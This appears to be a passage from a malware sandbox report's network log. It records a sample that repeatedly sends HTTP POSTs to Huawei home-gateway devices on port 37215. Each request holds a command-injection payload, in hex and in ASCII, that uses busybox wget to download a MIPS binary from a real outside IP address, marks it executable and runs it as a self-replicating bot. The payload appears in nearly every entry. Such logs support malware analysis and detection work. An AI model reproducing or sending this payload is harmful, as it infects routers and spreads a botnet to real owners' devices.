62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        595192.168.2.2334414197.67.226.24337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.453747034 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        596192.168.2.235216641.121.185.3437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.453795910 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        597192.168.2.2358090157.97.191.1837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.453859091 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        598192.168.2.233436841.145.133.22337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.454797983 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        599192.168.2.2355734124.250.149.16637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.491153955 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        600192.168.2.2336682129.163.189.837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.491189003 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        601192.168.2.2346724176.84.205.11437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.491190910 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        602192.168.2.235649441.153.160.2937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.491198063 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        603192.168.2.2338300197.158.164.24037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.491831064 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        604192.168.2.234275841.65.56.4237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.491858006 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
